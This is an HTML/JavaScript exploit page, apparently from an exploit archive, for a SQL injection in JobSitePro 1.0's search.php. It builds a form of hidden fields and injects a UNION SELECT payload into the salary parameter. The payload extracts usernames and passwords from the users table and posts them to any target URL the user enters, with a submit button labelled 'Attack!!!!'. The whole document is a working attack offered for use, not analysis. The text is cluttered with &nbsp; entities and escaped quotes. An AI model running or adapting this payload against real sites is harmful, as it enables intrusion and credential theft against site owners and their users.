JobSitePro 1.0 (search.php) Remote SQL Injection Exploit

                                                <html>
<head>

<meta&nbsp;http-equiv=\"Content-Type\"&nbsp;content=\"text/html;&nbsp;charset=windows-1254\">

</head>
<body>
<div>
<script&nbsp;language=\"JavaScript\">
//Coded&nbsp;by&nbsp;ajann

//\'===============================================================================================
//\'[Script&nbsp;Name:&nbsp;JobSitePro&nbsp;1.0&nbsp;(search.php)&nbsp;Remote&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit
//\'[Coded&nbsp;by&nbsp;&nbsp;&nbsp;:&nbsp;ajann
//\'[Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann
//\'[Contact&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;:(
//\'[S.Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://phplabs.com/
//\'[$$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;39.95&nbsp;$
//\'[Using&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Write&nbsp;Target&nbsp;after&nbsp;Submit&nbsp;Click
//\'===============================================================================================


tittle=\'JobSitePro&nbsp;1.0&nbsp;(search.php)&nbsp;Remote&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit\'
value=\'\"\';
sql=\'1&nbsp;union&nbsp;select&nbsp;1,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,58),password),3&nbsp;from&nbsp;users/*\';
valueclose=\'\">\';

attack=value+sql+valueclose;
document.write(\'<title>\'&nbsp;+&nbsp;tittle&nbsp;+&nbsp;\'</title>\')
document.write(\'<body&nbsp;bgcolor=\"#000000\">\');
document.write(\'<p><b><font&nbsp;face=\"Verdana\"&nbsp;size=\"2\"&nbsp;color=\"#008000\">\'&nbsp;+&nbsp;tittle&nbsp;+&nbsp;\'</font></b></p>\');
document.write(\'<form&nbsp;method=\"post\"&nbsp;name=\"form1\"&nbsp;action=\"http://phplabs.com/demo/jobsitepro/search.php\"&nbsp;enctype=\"multipart/form-data\"&nbsp;onSubmit=\"send();\">\');
document.write(\'<b><font&nbsp;color=\"#008000\"><font&nbsp;face=\"Verdana\"&nbsp;size=\"1\">Target</font><font&nbsp;face=\"Verdana\"&nbsp;size=\"1\">[site.com/path]:</font></font></b>\');
document.write(\'<form&nbsp;method=\"post\"&nbsp;name=\"form1\"&nbsp;action=\"a\"&nbsp;enctype=\"multipart/form-data\">\')
document.write(\'&nbsp;&nbsp;&nbsp;\')
document.write(\'<input&nbsp;type=\"text\"&nbsp;name=\"hedef\"&nbsp;value=\"http://\"&nbsp;onChange=\"control();\">\')
document.write(\'<SELECT&nbsp;name=\"jobtype\"&nbsp;style=\"visibility:&nbsp;hidden;\">\')
document.write(\'<OPTION&nbsp;value=\"all\"&nbsp;SELECTED>All&nbsp;Categories</OPTION>\')
document.write(\'</SELECT>\')
document.write(\'<input&nbsp;name=\"city\"&nbsp;type=\"text\"&nbsp;id=\"city\"&nbsp;size=\"45\"&nbsp;style=\"visibility:&nbsp;hidden;\">\')
document.write(\'<select&nbsp;name=\"state\"&nbsp;style=\"visibility:&nbsp;hidden;\">\')
document.write(\'<option&nbsp;value=\"all\"&nbsp;selected>\')
document.write(\'</option>\')
document.write(\'</select>\')
document.write(\'<select&nbsp;name=\"country\"&nbsp;style=\"visibility:&nbsp;hidden;\">\')
document.write(\'<option&nbsp;value=\"US\"&nbsp;selected>United&nbsp;States&nbsp;</option>\')
document.write(\'</select>\')
document.write(\'<input&nbsp;name=\"keywords\"&nbsp;type=\"text\"&nbsp;id=\"keywords\"&nbsp;value=\"&nbsp;\"&nbsp;style=\"visibility:&nbsp;hidden;\">\')
document.write(\'<input&nbsp;name=\"boolean\"&nbsp;type=\"radio\"&nbsp;value=\"any\"&nbsp;checked&nbsp;style=\"visibility:&nbsp;hidden;\">\')
document.write(\'<select&nbsp;name=\"date\"&nbsp;id=\"date\"&nbsp;style=\"visibility:&nbsp;hidden;\">\')
document.write(\'<option&nbsp;value=\"all\"&nbsp;selected>List&nbsp;All&nbsp;Jobs</option>\')
document.write(\'</select>\')
document.write(\'<select&nbsp;name=\"exempt\"&nbsp;id=\"exempt\"&nbsp;style=\"visibility:&nbsp;hidden;\">\')
document.write(\'<option&nbsp;value=\"all\"&nbsp;selected>Any</option>\')
document.write(\'</select>\')
document.write(\'<input&nbsp;name=\"salary\"&nbsp;style=\"visibility:&nbsp;hidden;\"&nbsp;type=\"text\"&nbsp;id=\"salary\"&nbsp;size=\"10\"&nbsp;value=\'&nbsp;+&nbsp;attack)
document.write(\'<select&nbsp;name=\"perpage\"&nbsp;id=\"perpage\"&nbsp;style=\"visibility:&nbsp;hidden;\">\')
document.write(\'<option&nbsp;value=\"25\"&nbsp;selected>25</option>\')
document.write(\'</select>\')
document.write(\'<input&nbsp;name=\"act\"&nbsp;type=\"hidden\"&nbsp;id=\"act\"&nbsp;value=\"dosearch\">\')
document.write(\'<br><input&nbsp;type=\"submit\"&nbsp;name=\"Submit\"&nbsp;value=\"Attack!!!!\"\')
document.write(\'</form>\')

&nbsp;&nbsp;&nbsp;function&nbsp;control()&nbsp;{

&nbsp;if&nbsp;(document.form1.hedef.value==\"\"){
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;alert(\"Please&nbsp;all&nbsp;fields&nbsp;correct!\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;}
&nbsp;&nbsp;}


&nbsp;function&nbsp;send()&nbsp;{

target=document.form1.hedef.value;
file=\'search.php\';
document.form1.action=target+file;



&nbsp;&nbsp;&nbsp;}



</script>

</div>

</body>
</html>

&nbsp;